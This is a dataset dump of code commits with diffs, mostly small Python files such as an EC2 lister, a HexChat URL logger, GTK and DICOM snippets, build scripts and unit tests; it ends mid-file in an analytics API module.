Dataset columns:

commit        string, length 40–40
subject       string, length 1–3.25k
old_file      string, length 4–311
new_file      string, length 4–311
old_contents  string, length 0–26.3k
lang          string, 3 classes
proba         float64, range 0–1
diff          string, length 0–7.82k
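The diff column stores its patch text percent-encoded in the raw data (%0A for newlines, %22 for quotes, %25 for a literal percent sign). A minimal decoding sketch, assuming each row is available as a plain Python dict with the columns above; decode_diff is a hypothetical helper, not part of the dataset:

from urllib.parse import unquote

def decode_diff(row):
    # unquote() maps %0A back to a newline, %22 to a double quote,
    # %25 to a literal "%", and so on, restoring readable patch text.
    return unquote(row["diff"])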
51e368584d59ad2f308f1c9229fbbbf40c504749
Create list.py
list.py
list.py
Python
0.000003
@@ -0,0 +1,1009 @@
+import argparse
import boto.ec2

access_key = ''
secret_key = ''

def get_ec2_instances(region):
    ec2_conn = boto.ec2.connect_to_region(region,
                aws_access_key_id=access_key,
                aws_secret_access_key=secret_key)
    reservations = ec2_conn.get_all_reservations()
    for reservation in reservations: 
        print region+':',reservation.instances

    for vol in ec2_conn.get_all_volumes():
        print region+':',vol.id

 

def main():
    regions = ['us-east-1','us-west-1','us-west-2','eu-west-1','sa-east-1',
                'ap-southeast-1','ap-southeast-2','ap-northeast-1']
    parser = argparse.ArgumentParser()
    parser.add_argument('access_key', help='Access Key');
    parser.add_argument('secret_key', help='Secret Key');
    args = parser.parse_args()
    global access_key
    global secret_key
    access_key = args.access_key
    secret_key = args.secret_key
    
    for region in regions: get_ec2_instances(region)

if __name__ =='__main__':main()
c0bca49a19e4f97663b9f282bb11768457aec89e
Add example of tycho2 usage
example.py
example.py
Python
0
@@ -0,0 +1,1096 @@
+# -*- coding: utf-8 -*-
"""
Created on Sat Oct 21 00:17:33 2017

@author: lauri.kangas
"""

import matplotlib.pyplot as plt
import numpy as np

from tycho2 import tycho2
from projections import stereographic, unity
import coordinate_transformations as coord
 
index = np.load('tyc2index.npy')
catalog = np.load('tyc2.npy', mmap_mode='r')
suppl = np.load('tyc2sup.npy')

center_RADEC = np.radians([90, 0])
rotation = np.radians(0)

fov_degrees = np.array([70, 70])
fov_radians = np.radians(fov_degrees)
half_fov_radians = fov_radians/2

projection = stereographic
projection = unity

image_plane_half_fov = projection(half_fov_radians)

LM = 12
factor = 4

TYC2 = tycho2('tyc2index.npy', 'tyc2.npy', 'tyc2sup.npy', projection=projection)
image_x, image_y, mags = TYC2.stars_in_fov(center_RADEC, fov_radians, rotation, LM=LM)

plt.clf()
plt.scatter(image_x, image_y, (LM-mags)**2.5/LM*factor, alpha=1)

plt.axis('equal')

import matplotlib.patches as patches

plt.gca().add_patch(patches.Rectangle(-image_plane_half_fov, *(2*image_plane_half_fov), fill=False))
plt.tight_layout()
plt.axis('off')
6dc4d2d1e9ef998ff310c14c54586ca694572801
Add extract plugin
extract.py
extract.py
Python
0.000001
@@ -0,0 +1,979 @@
+"""This plugin extracts the main content of a webpage"""
"""e.g. extracting the article of a url of bbc.co.uk"""

from utils import add_cmd, add_handler
import utils
import requests
from bs4 import BeautifulSoup

name = "extract"
cmds = ["extract"]

def main(irc):
	if name not in irc.plugins.keys():
		irc.plugins[name] = {}

@add_cmd
def extract(irc, event, args):
	try:
		html = requests.get(args[0]).text
		soup = BeautifulSoup(html)
		for script in soup(["script", "style"]):
		    script.extract()
		text = soup.get_text()
		lines = (line.strip() for line in text.splitlines())
		chunks = (phrase.strip() for line in lines for phrase in line.split(" "))
		text = '\n'.join(chunk for chunk in chunks if chunk)
		text = text.encode('ascii', 'ignore')
		irc.reply(event, (text[:350] + '..') if len(text) > 350 else text)
	except IndexError:
		irc.reply(event, utils.gethelp("extract"))
	except:
		irc.reply(event, "Error extracting informations")


add_handler(extract, name)
8c71a177c16762ab50dafe2528d24fab4ccf0925
Add py solution for 462. Minimum Moves to Equal Array Elements II
py/minimum-moves-to-equal-array-elements-ii.py
py/minimum-moves-to-equal-array-elements-ii.py
Python
0.000163
@@ -0,0 +1,236 @@
+class Solution(object):
    def minMoves2(self, nums):
        """
        :type nums: List[int]
        :rtype: int
        """
        nums.sort()
        median = nums[len(nums) / 2]
        return sum(abs(x - median) for x in nums)
9cd494f526fa49e04bbdbb31dc6d32f444bbbba8
add a tool to print the content of SEG frames
util/dumpSEGPixelData.py
util/dumpSEGPixelData.py
Python
0
@@ -0,0 +1,1653 @@
+import pydicom, sys
from colorama import Fore, Style, init

# colorama
init()

d = pydicom.read_file(sys.argv[1])
if len(sys.argv)>2:
    frame = int(sys.argv[2])-1
    print("Dumping frame "+str(frame))
else:
    frame = None
print(d.Rows)
print(d.Columns)
print(d.NumberOfFrames)

totalPixels = int(d.Rows*d.Columns*d.NumberOfFrames/8)
if totalPixels%8:
    totalPixels = totalPixels + 1
totalPixels = totalPixels + (totalPixels % 2)
print("Total pixels expected: %i" % totalPixels)

print("Total pixels actual: %i" % len(d.PixelData))

if not frame is None:
    frames = [frame]
else:
    frames = range(d.NumberOfFrames)



import numpy as np
unpacked = np.unpackbits(np.frombuffer(d.PixelData,dtype=np.uint8))

print("With numpy unpackbits:")

for f in frames:
    print("Frame %i" % f)
    for i in range(d.Rows):
        for j in range(d.Columns):
            pixelNumber = f*d.Rows*d.Columns+i*d.Columns+j
            if int(pixelNumber/8)%2:
                sys.stdout.write(Fore.RED)
            else:
                sys.stdout.write(Fore.WHITE)
            if unpacked[pixelNumber]:
                sys.stdout.write("X")
            else:
                sys.stdout.write(".")
        print("")

print("\nWith manual unpacking:")
for f in frames:
    print("Frame %i" % f)
    for i in range(d.Rows):
        for j in range(d.Columns):
            pixelNumber = f*d.Rows*d.Columns+i*d.Columns+j
            byteNumber = int(pixelNumber/8)
            bitPosition = pixelNumber % 8
            if byteNumber%2:
                sys.stdout.write(Fore.RED)
            else:
                sys.stdout.write(Fore.WHITE)
            if (d.PixelData[byteNumber] >> bitPosition) & 1:
                sys.stdout.write("X")
            else:
                sys.stdout.write(".")
        print("")
print(Style.RESET_ALL)
ec3ef6e8770b9a36f20a05216d8e0964107a8689
Add a new snippet (Python GTK+3).
python/pygtk/python_gtk3_pygobject/combobox.py
python/pygtk/python_gtk3_pygobject/combobox.py
Python
0.000002
@@ -0,0 +1,2840 @@
+#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# Copyright (c) 2015 Jérémie DECOCK (http://www.jdhp.org)

"""
This is the simplest Python GTK+3 snippet.

See: http://python-gtk-3-tutorial.readthedocs.org/en/latest/combobox.html

"For a simple list of textual choices, the model-view API of Gtk.ComboBox can
be a bit overwhelming. In this case, Gtk.ComboBoxText offers a simple
alternative."
"""

from gi.repository import Gtk as gtk

COMBOBOX_TEXT_LIST = ["Hello World!", "Hi!", "Goodbye."]

def print_text(widget, data):
    """
    Print the content of the ComboBoxText widget.

    This is an usage example fo gtk.ComboBoxText.get_active_text().
    """
    print(data.get_active_text()) # data is a gtk.ComboBoxText widget

def reset_selection(widget, data):
    """
    Clear the content of the ComboBoxText widget.

    This is an usage example fo gtk.ComboBoxText.set_active().
    """
    data.set_active(0) # select the first item ; data is a gtk.ComboBoxText widget

def main():
    window = gtk.Window()

    vertical_box = gtk.Box(orientation = gtk.Orientation.VERTICAL, spacing = 6) # 6 pixels are placed between children
    window.add(vertical_box)

    # Label and Combobox ##############

    horizontal_box1 = gtk.Box(orientation = gtk.Orientation.HORIZONTAL, spacing = 6) # 6 pixels are placed between children

    label = gtk.Label(label="Text to print:")
    horizontal_box1.pack_start(label, True, True, 0)

    combobox = gtk.ComboBoxText()
    combobox.set_entry_text_column(0) # sets the model column which ComboBox should use to get strings from to be text_column
    for text in COMBOBOX_TEXT_LIST:
        combobox.append_text(text) # fill the combobox
    combobox.set_active(0) # select the first item
    horizontal_box1.pack_start(combobox, True, True, 0)

    vertical_box.pack_start(horizontal_box1, True, True, 0)

    # Buttons #########################

    horizontal_box2 = gtk.Box(orientation = gtk.Orientation.HORIZONTAL, spacing = 6) # 6 pixels are placed between children

    # Print button
    button1 = gtk.Button(label="Print")
    button1.connect("clicked", print_text, combobox) # connect("event", callback, data)
    horizontal_box2.pack_start(button1, True, True, 0)

    # Clean button
    button2 = gtk.Button(label="Reset")
    button2.connect("clicked", reset_selection, combobox) # connect("event", callback, data)
    horizontal_box2.pack_start(button2, True, True, 0)

    vertical_box.pack_start(horizontal_box2, True, True, 0)

    ###

    window.connect("delete-event", gtk.main_quit) # ask to quit the application when the close button is clicked
    window.show_all() # display the window
    gtk.main() # GTK+ main loop

if __name__ == '__main__':
    main()
5c3589b295c9b9156a6bbfdcecc81754a76f9e0d
Create url-logger.py
url-logger.py
url-logger.py
Python
0.000017
@@ -0,0 +1,2097 @@
+from datetime import datetime
import hexchat
import os
import re

__module_name__ = "URL Logger"
__module_author__ = "Poorchop"
__module_version__ = "0.1"
__module_description__ = "Log URLs from specific channels and PMs to disk"

# channels PMs
watched_channels = ("#hexchat", "TingPing")

events = ("Channel Message", "Channel Action",
          "Channel Msg Hilight", "Channel Action Hilight",
          "Private Message", "Private Message to Dialog",
          "Private Action", "Private Action to Dialog")
# regex source: http://blog.mattheworiordan.com/post/13174566389/url-regular-expression-for-links-with-or-without-the
url_regex = re.compile("((([A-Za-z]{3,9}:(?:\/\/)?)(?:[\-;:&=\+\$,\w]+@)?[A-Za-z0-9\.\-]+|(?:www\.|[\-;:&=\+\$,\w]+@)[A"
                       "-Za-z0-9\.\-]+)((?:\/[\+~%\/\.\w\-_]*)?\??(?:[\-\+=&;%@\.\w_]*)#?(?:[\.\!\/\\\w]*))?)")


def url_logger(stripped_word, nick, network, chan, time):
    directory = os.path.join(hexchat.get_info("configdir"), "logs", network, chan)
    if not os.path.exists(directory):
        os.makedirs(directory)
    directory = os.path.join(hexchat.get_info("configdir"), "logs", network, chan, "urls.txt")
    f = open(directory, "a")
    f.write(time + " " + nick + "@" + chan + ":" + network + " - " + stripped_word + "\n")
    f.close()


def url_finder(word, nick, network, chan, time):
    for w in word[1].split():
        stripped_word = hexchat.strip(w, -1, 3)
        if url_regex.match(stripped_word):
            url_logger(stripped_word, nick, network, chan, time)


def chan_check_cb(word, word_eol, userdata):
    word = [(word[i] if len(word) > i else "") for i in range(4)]
    chan = hexchat.get_info("channel")
    if chan in watched_channels:
        nick = hexchat.strip(word[0], -1, 3)
        time = datetime.now().strftime("[%b %d %Y %H:%M]")
        network = hexchat.get_info("network")
        url_finder(word, nick, network, chan, time)


for event in events:
    hexchat.hook_print(event, chan_check_cb)

hexchat.prnt(__module_name__ + " version " + __module_version__ + " loaded")
2206ec50a5645f3dbcb905f0eae90e9f4b1e5262
Change compare condition
platformio/builder/scripts/ststm32.py
platformio/builder/scripts/ststm32.py
# Copyright (C) Ivan Kravets <me@ikravets.com>
# See LICENSE for details.

"""
    Builder for ST STM32 Series ARM microcontrollers.
"""

import platform
from os.path import isfile, join

from SCons.Script import (COMMAND_LINE_TARGETS, AlwaysBuild, Default,
                          DefaultEnvironment, Exit, SConscript)

env = DefaultEnvironment()

SConscript(env.subst(join("$PIOBUILDER_DIR", "scripts", "basearm.py")))

if "gdb" in env['UPLOAD_PROTOCOL']:
    if not isfile(join(env.subst("$PROJECT_DIR"), "upload.gdb")):
        Exit(
            "You are using GDB as firmware uploader. "
            "Please specify upload commands in upload.gdb "
            "file in project directory!"
        )
    env.Replace(
        UPLOADER=join(
            "$PIOPACKAGES_DIR", "toolchain-gccarmnoneeabi",
            "bin", "arm-none-eabi-gdb"
        ),
        UPLOADERFLAGS=[
            join("$BUILD_DIR", "firmware.elf"),
            "-batch",
            "-x",
            join("$PROJECT_DIR", "upload.gdb")
        ],
        UPLOADCMD="$UPLOADER $UPLOADERFLAGS"
    )
else:
    env.Replace(
        UPLOADER=join("$PIOPACKAGES_DIR", "tool-stlink", "st-flash"),
        UPLOADERFLAGS=[
            "write",        # write in flash
            "$SOURCES",     # firmware path to flash
            "0x08000000"    # flash start adress
        ],
        UPLOADCMD="$UPLOADER $UPLOADERFLAGS"
    )

env.Append(
    CPPDEFINES=[
        "${BOARD_OPTIONS['build']['variant'].upper()}"
    ],

    LINKFLAGS=[
        "-nostartfiles",
        "-nostdlib"
    ]
)

#
# Target: Build executable and linkable firmware
#

target_elf = env.BuildFirmware()

#
# Target: Build the .bin file
#

if "uploadlazy" in COMMAND_LINE_TARGETS:
    target_firm = join("$BUILD_DIR", "firmware.bin")
else:
    target_firm = env.ElfToBin(join("$BUILD_DIR", "firmware"), target_elf)

#
# Target: Print binary size
#

target_size = env.Alias("size", target_elf, "$SIZEPRINTCMD")
AlwaysBuild(target_size)

#
# Target: Upload by default .bin file
#

disable_msd = (platform.system() == "Darwin" and
               platform.release().startswith("14."))
if "mbed" in env.subst("$FRAMEWORK") and not disable_msd:
    upload = env.Alias(["upload", "uploadlazy"], target_firm,
                       env.UploadToDisk)
else:
    upload = env.Alias(["upload", "uploadlazy"], target_firm, "$UPLOADCMD")
AlwaysBuild(upload)

#
# Target: Define targets
#

Default([target_firm, target_size])
Python
0.000001
@@ -424,17 +424,8 @@
 
if 
-"gdb" in env[
@@ -442,16 +442,25 @@
 OTOCOL']
+ == "gdb"
 :
 if
3c4c06607eb14920cf4b9d0e4fb6d29f37d1d0ec
Add db_add.py, adding a post from a file, with tags from the filename.
db_add.py
db_add.py
Python
0
@@ -0,0 +1,1485 @@
+#!/usr/bin/env python
# -*- coding: iso-8859-1 -*-

from sys import argv, exit
from dbclient import dbclient
from hashlib import md5
import Image
from cStringIO import StringIO
from pyexiv2 import Image as ExivImage
from os.path import basename

if len(argv) < 2:
	print "Usage:", argv[0], "filename [filename [..]]"
	exit(1)

def determine_filetype(data):
	if data[:3] == "\xff\xd8\xff": return "jpeg"
	if data[:4] == "GIF8": return "gif"
	if data[:4] == "\x89PNG": return "png"
	if data[:2] == "BM": return "bmp"
	if data[:3] == "FWS" or data[:3] == "CWS": return "swf"

def imagesize(fh):
	img = Image.open(fh)
	return img.size

def imagetime(fn):
	img = ExivImage(fn)
	img.readMetadata()
	return img['Exif.Image.DateTime']

client = dbclient()
for fn in argv[1:]:
	data = file(fn).read()
	m = md5(data).hexdigest()
	ft = determine_filetype(data)
	assert ft
	post = client.get_post(m)
	if not post:
		datafh = StringIO(data)
		w, h = imagesize(datafh)
		args = {"md5": m, "width": w, "height": h, "filetype": ft}
		try:
			datafh.seek(0)
			args["date"] = imagetime(fn)
		except Exception:
			pass
		client.add_post(**args)
	full = []
	weak = []
	post = client.get_post(m)
	posttags = map(lambda t: t[1:] if t[0] == "~" else t, post["tagguid"])
	for tag in basename(fn).split()[:-1]:
		if tag[0] == "~":
			tags = weak
			tag = tag[1:]
		else:
			tags = full
		t = client.find_tag(tag)
		if t and t not in posttags: tags.append(t)
	if full or weak:
		client.tag_post(m, full, weak)
7570e757e79c29974afffeee036f056328a06fe9
Create pull.py
pull.py
pull.py
Python
0.000001
@@ -0,0 +1,43 @@
+It's a file to try my first pull derective
5d38ab06fd014241cba7e8cdcfed9887a92460b9
Add smoke tests aperiodic
neurodsp/tests/test_aperiodic_dfa.py
neurodsp/tests/test_aperiodic_dfa.py
Python
0.000013
@@ -0,0 +1,618 @@
+"""Tests for fractal analysis using fluctuation measures."""

from neurodsp.tests.settings import FS

from neurodsp.aperiodic.dfa import *

###################################################################################################
###################################################################################################

def test_compute_fluctuations(tsig):

    t_scales, flucs, exp = compute_fluctuations(tsig, FS)

def test_compute_rescaled_range(tsig):

    rs = compute_rescaled_range(tsig, 10)

def test_compute_detrended_fluctuation(tsig):

    out = compute_detrended_fluctuation(tsig, 10)
3628c21841eea385dbc13e0065ab41138cf102a6
Add users to the admin
djangae/contrib/auth/admin.py
djangae/contrib/auth/admin.py
Python
0
@@ -0,0 +1,105 @@
+from django.contrib import admin

from djangae.contrib.auth.models import User

admin.site.register(User)
e506a059369b089cb4c163669a04fbb9d05e9884
add minimal FBO example
examples/minimalframebufferexample.py
examples/minimalframebufferexample.py
Python
0.000001
@@ -0,0 +1,1564 @@
+from scipy.misc import imsave

from glitter import ShaderProgram, RectangleTexture, Framebuffer, VertexArray
from glitter.contexts.glut import GlutWindow, main_loop

vertex_shader = """
#version 400 core

layout(location=0) in vec4 in_position;

void main() {
    gl_Position = in_position;
}
"""

fragment_shader = """
#version 400 core

layout(location=0) out vec4 out_color;
uniform float dimx, dimy;

void main() {
    out_color = vec4(gl_FragCoord.x / dimx, gl_FragCoord.y / dimy, 1.0, 1.0);
}
"""

class MinimalFramebufferExample(object):
    def __init__(self):
        self.window = GlutWindow(double=True, multisample=True, shape=(100, 800))
        self.window.display_callback = self.display

        self.shader = ShaderProgram(vertex=vertex_shader, fragment=fragment_shader)
        self.shader.dimy, self.shader.dimx = self.window.shape
        self.fbo = Framebuffer(RectangleTexture(shape=self.window.shape + (3,)))

        self.vao = VertexArray(((-1.0, -1.0), (-1.0, 1.0), (1.0, 1.0), (1.0, -1.0)), elements=((0, 1, 2), (0, 2, 3)))

    def save(self, filename):
        self.fbo.clear()
        with self.shader:
            with self.fbo:
                self.vao.draw()
        imsave(filename, self.fbo[0].data)

    def display(self):
        self.window.clear()
        with self.shader:
            self.vao.draw()
        self.window.swap_buffers()

    def run(self):
        main_loop()

if __name__ == "__main__":
    ie = MinimalFramebufferExample()
    ie.save("test.png")
    ie.run()
    # TODO why do I get a bus error on exit?
066c48effb2f2c1534e43687d031e01f823f098f
add common mixins
emgapi/viewsets.py
emgapi/viewsets.py
Python
0.000073
@@ -0,0 +1,1375 @@
+# -*- coding: utf-8 -*-

# Copyright 2017 EMBL - European Bioinformatics Institute
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import logging

from rest_framework import viewsets, mixins

logger = logging.getLogger(__name__)


class ReadOnlyListModelViewSet(mixins.ListModelMixin,
                               viewsets.GenericViewSet):
    """
    A viewset that provides default `list()` action.
    """
    pass


class ReadOnlyRetrieveModelViewSet(mixins.RetrieveModelMixin,
                                   viewsets.GenericViewSet):
    """
    A viewset that provides default `retrieve()` action.
    """
    pass


class ReadOnlyModelViewSet(mixins.RetrieveModelMixin,
                           mixins.ListModelMixin,
                           viewsets.GenericViewSet):
    """
    A viewset that provides default `list()` and `retrieve()` actions.
    """
    pass
59ccbc17e7e7f4f75b8f95bb1287b676466068db
Create snake1.py
snake1.py
snake1.py
Python
0.000569
@@ -0,0 +1 @@
+
cf496298c839e63a786bc8b4a934df09beef93ac
Add script to better log time
bin/log.py
bin/log.py
Python
0.000001
@@ -0,0 +1,1132 @@
+#!/usr/bin/env python

from datetime import date, datetime
from pathlib import Path
import csv
import os
import sys

if len(sys.argv) != 2:
    print("Usage: {} 'job to be logged'".format(sys.argv[0]))
    exit(1)

log_dir = "{}/time_logs".format(Path.home())
if not os.path.isdir(log_dir):
    os.mkdir(log_dir)

csv_file = "{}/{}_time_log.csv".format(log_dir, date.today())
csv_fields = ["job", "start", "end", "duration"]
job = sys.argv[1]


def now_string():
    return datetime.now().isoformat(timespec="seconds")


def new_row(job):
    return {"job": job, "start": now_string()}


def complete_row(row):
    row["end"] = now_string()

    start = datetime.fromisoformat(row["start"])
    end = datetime.fromisoformat(row["end"])

    row["duration"] = str(end - start)

    return row


if os.path.isfile(csv_file):
    with open(csv_file) as fh:
        rows = list(csv.DictReader(fh))
    rows[-1] = complete_row(rows[-1])
    rows.append(new_row(job))
else:
    rows = [new_row(job)]

with open(csv_file, "w") as fh:
    writer = csv.DictWriter(fh, csv_fields)

    writer.writeheader()
    writer.writerows(rows)
432ddd2d1885b76704ff6b2d78fe6e83a57ca5a0
remove jedi linter for now, as too unstable
build.py
build.py
#!/usr/bin/env python
#
#  -*- coding: utf-8 -*-
#
#  This file is part of PyBuilder
#
#  Copyright 2011-2014 PyBuilder Team
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.

import sys

sys.path.insert(0, 'src/main/python')  # This is only necessary in PyBuilder sources for bootstrap

from pybuilder import bootstrap
from pybuilder.core import Author, init, use_bldsup, use_plugin

bootstrap()

use_plugin("pypi:pybuilder_external_plugin_demo")

use_plugin("python.core")
use_plugin("python.pytddmon")
use_plugin("python.distutils")
use_plugin("python.install_dependencies")

use_plugin("copy_resources")
use_plugin("filter_resources")
use_plugin("source_distribution")

use_plugin("python.coverage")
use_plugin("python.unittest")
use_plugin("python.integrationtest")
use_plugin("python.flake8")
use_plugin("python.frosted")
use_plugin("python.jedi_linter")

if not sys.version_info[0:2] == (3, 2):
    use_plugin("python.cram")

use_plugin("python.pydev")
use_plugin("python.pycharm")
use_plugin("python.pytddmon")

use_bldsup()
use_plugin("pdoc")

summary = "An extensible, easy to use continuous build tool for Python"
description = """PyBuilder is a build automation tool for python.

PyBuilder is a software build tool written in pure Python which mainly targets Python applications.
It is based on the concept of dependency based programming but also comes along with powerful plugin mechanism that
allows the construction of build life cycles similar to those known from other famous build tools like Apache Maven.
"""

authors = [Author("Alexander Metzner", "alexander.metzner@gmail.com"),
           Author("Maximilien Riehl", "max@riehl.io"),
           Author("Michael Gruber", "aelgru@gmail.com"),
           Author("Udo Juettner", "udo.juettner@gmail.com")]

url = "http://pybuilder.github.io"
license = "Apache License"
version = "0.10.33"

default_task = ["analyze", "publish"]


@init
def initialize(project):
    project.build_depends_on("fluentmock")
    project.build_depends_on("mock")
    project.build_depends_on("mockito-without-hardcoded-distribute-version")
    project.build_depends_on("pyfix")  # required test framework
    project.build_depends_on("pyassert")
    project.build_depends_on("wheel")
    project.build_depends_on("pdoc")
    project.build_depends_on("pygments")

    project.set_property("verbose", True)

    project.set_property("coverage_break_build", False)
    project.get_property("coverage_exceptions").append("pybuilder.cli")
    project.get_property("coverage_exceptions").append("pybuilder.plugins.core_plugin")

    project.set_property('flake8_break_build', True)
    project.set_property('flake8_include_test_sources', True)
    project.set_property('flake8_include_scripts', True)
    project.set_property('flake8_max_line_length', 130)

    project.set_property('frosted_include_test_sources', True)
    project.set_property('frosted_include_scripts', True)

    project.set_property("copy_resources_target", "$dir_dist")
    project.get_property("copy_resources_glob").append("LICENSE")
    project.get_property("filter_resources_glob").append("**/pybuilder/__init__.py")

    project.get_property("source_dist_ignore_patterns").append(".project")
    project.get_property("source_dist_ignore_patterns").append(".pydevproject")
    project.get_property("source_dist_ignore_patterns").append(".settings")

    # enable this to build a bdist on vagrant
    # project.set_property("distutils_issue8876_workaround_enabled", True)
    project.get_property("distutils_commands").append("bdist_wheel")
    project.set_property("distutils_console_scripts", ["pyb_ = pybuilder.cli:main"])
    project.set_property("distutils_classifiers", [
        'Programming Language :: Python',
        'Programming Language :: Python :: Implementation :: CPython',
        'Programming Language :: Python :: Implementation :: PyPy',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.2',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Development Status :: 4 - Beta',
        'Environment :: Console',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: Apache Software License',
        'Topic :: Software Development :: Build Tools',
        'Topic :: Software Development :: Quality Assurance',
        'Topic :: Software Development :: Testing'])
Python
0
@@ -1341,41 +1341,8 @@
 d")
-use_plugin("python.jedi_linter")
 

if
addb7f342e5c2bc0f1df19bd6d00d50be23a52da
Add Year
year.py
year.py
Python
0
@@ -0,0 +1,422 @@
+months=['January','February','March','April','May','June','July','August','September','October','November','December']
endings=['st','nd','rd']+17*['th']+['st','nd','rd']+7*['th']+['st']
year=raw_input('Year:')
month=raw_input('Month(1--12):')
day=raw_input('day(1--31):')
month_number=int(month)
day_number=int(day)
month_name=months[month_number-1]
ordinal=day+endings[day_number-1]
print month_name+ ''+ordinal+''+year
dac398518bac49c6c51d04166c021323cdba9235
Add unit tests.
fdp-api/python/tests/test_metadata.py
fdp-api/python/tests/test_metadata.py
Python
0
@@ -0,0 +1,1672 @@
+from nose import with_setup
from nose.tools import assert_equals, assert_in, assert_true, assert_false
from metadata import FAIRConfigReader, FAIRGraph, FDPath
from urllib2 import urlparse


reader = FAIRConfigReader()

def test_paths():
    id = 'abc'
    for resource in ['fdp', 'doc']:
        assert_equals(FDPath(resource), FDPath(resource, id))

    for resource in ['cat', 'dat', 'dist']:
        assert_equals(FDPath(resource, id), '%s/%s' % (FDPath(resource), id))


def test_sections():
    set_a = set(['fdp','catalog/catalog-01','dataset/breedb','distribution/breedb-sqldump','distribution/breedb-sparql'])
    set_b = set(reader.getSectionHeaders())
    assert_true(set_a == set_b)


def test_get_items():
    for section,fields in reader.getMetadata().iteritems():
        for field in fields:
            assert_false(isinstance(reader.getItems(section, field), list))


def test_get_triples():
    for triple in reader.getTriples():
        assert_true(isinstance(triple, tuple))
        assert_equals(len(triple), 3)


base_uri = 'http://127.0.0.1:8080'
g = FAIRGraph(base_uri)


def test_base_uri():
    assert_equals(base_uri, g.baseURI())


def test_doc_uri():
    assert_equals(urlparse.urljoin(base_uri, 'doc'), g.docURI())


def test_fdp_uri():
    assert_equals(urlparse.urljoin(base_uri, 'fdp'), g.fdpURI())


def test_catalog_uri():
    assert_equals(urlparse.urljoin(base_uri, 'catalog/catalog-01'), g.catURI('catalog-01'))


def test_dataset_uri():
    assert_equals(urlparse.urljoin(base_uri, 'dataset/breedb'), g.datURI('breedb'))


def test_distribution_uri():
    assert_equals(urlparse.urljoin(base_uri, 'distribution/breedb-sqldump'), g.distURI('breedb-sqldump'))
19c94f3bf71c07763dfddd72b867502d765d01db
Add https://gist.github.com/2349756
sqlite.py
sqlite.py
Python
0.000461
@@ -0,0 +1,1135 @@
+import scraperwiki
from dumptruck import DumpTruck

dt = DumpTruck()

def execute(sqlquery, data=None, verbose=1):
    """ Should return list of lists, but returns list of dicts """
    return dt.execute(sqlquery, *data, commit=False)
    # other way [ dict(zip(result["keys"], d)) for d in result["data"] ]

def save(unique_keys, data, table_name="swdata", verbose=2, date=None):
    dt.create_table(data, table_name = table_name)
    #dt.add_index(unique_keys)
    return dt.insert(data, table_name = table_name)
    
def attach(name, asname=None, verbose=1):
    "This somehow connects to scraperwiki."
    raise NotImplementedError

def commit(verbose=1):
    dt.commit()

def select(sqlquery, data=None, verbose=1):
    sqlquery = "select %s" % sqlquery # maybe check if select or another command is there already?
    return dt.execute(sqlquery, *data, commit = False)

def show_tables(dbname=""):
    return dt.tables()

def save_var(name, value, verbose=2):
    return dt.save_var(name, value)

def get_var(name, default=None, verbose=2):
    try:
        return dt.get_var(name)
    except NameError:
        return default
07e074e662b33713a266777300354e8953ce3b78
ADD connection class to Azure
plugin/connection.py
plugin/connection.py
Python
0.000001
@@ -0,0 +1,910 @@
+from plugin import utils
from azure import servicemanagement

class AzureConnectionClient():
    """Provides functions for getting the Azure Service Management Service
    """

    def __init__(self):
        self.connection = None

    def client(self):
        """Represents the AzureConnection Client
        """

        azure_subscription = self._get_azure_subscription()
        azure_certificate = self._get_azure_certificate()

        return ServiceManagementService(azure_subscription, 
                                        azure_certificate)
    
    def _get_azure_subscription(self):
        node_properties = \
            utils.get_instance_or_source_node_properties()
        return node_properties["subscription"]
    
    def _get_azure_certificate(self):
        node_properties = \
            utils.get_instance_or_source_node_properties()
        return node_properties["certificate"]
9ceb4f394c19a74d8cd28698eeb9116cf8099117
add anno
annot_to_densitymap.py
annot_to_densitymap.py
Python
0.999998
@@ -0,0 +1,746 @@
+import xml.etree.ElementTree as ET
import numpy as np
import xmltodict
import matplotlib.pyplot as plt
#import cv2

xml_data = 'data/Cam253/[Cam253]-2016_4_21_15h_150f/000150.xml'

with open(xml_data) as xml_d:
	doc = xmltodict.parse(xml_d.read())

img = np.zeros((352, 240), np.float32)

def add_to_image(image, bbox):
	xmin = int(bbox['xmin'])
	ymin = int(bbox['ymin'])
	xmax = int(bbox['xmax'])
	ymax = int(bbox['ymax'])
	density = 1/ float((ymax - ymin) * (xmax - xmin))	

	image[xmin:xmax, ymin:ymax] += density
	print(np.sum(image))
	print(xmin)
	print(xmax)
	print(ymin)
	print(ymax)
	return image

for vehicle in doc['annotation']['vehicle']:
	add_to_image(img, vehicle['bndbox'])

imgplot = plt.imshow(img)
plt.show()
print(np.sum(img))
0b0150ad73c52ea5b23def899edb819bd3318eb1
fix uncaught analytics exception
lbrynet/analytics/api.py
lbrynet/analytics/api.py
import functools
import json
import logging

from requests import auth
from requests_futures import sessions

from lbrynet.conf import settings
from lbrynet.analytics import utils


log = logging.getLogger(__name__)


def log_response(fn):
    def _log(future):
        if future.cancelled():
            log.warning('Request was unexpectedly cancelled')
        else:
            response = future.result()
            log.debug('Response (%s): %s', response.status_code, response.content)

    @functools.wraps(fn)
    def wrapper(*args, **kwargs):
        future = fn(*args, **kwargs)
        future.add_done_callback(_log)
        return future
    return wrapper


class Api(object):
    def __init__(self, session, url, write_key):
        self.session = session
        self.url = url
        self.write_key = write_key

    @property
    def auth(self):
        return auth.HTTPBasicAuth(self.write_key, '')

    @log_response
    def batch(self, events):
        """Send multiple events in one request.

        Each event needs to have its type specified.
        """
        data = json.dumps({
            'batch': events,
            'sentAt': utils.now(),
        })
        log.debug('sending %s events', len(events))
        log.debug('Data: %s', data)
        return self.session.post(self.url + '/batch', json=data, auth=self.auth)

    @log_response
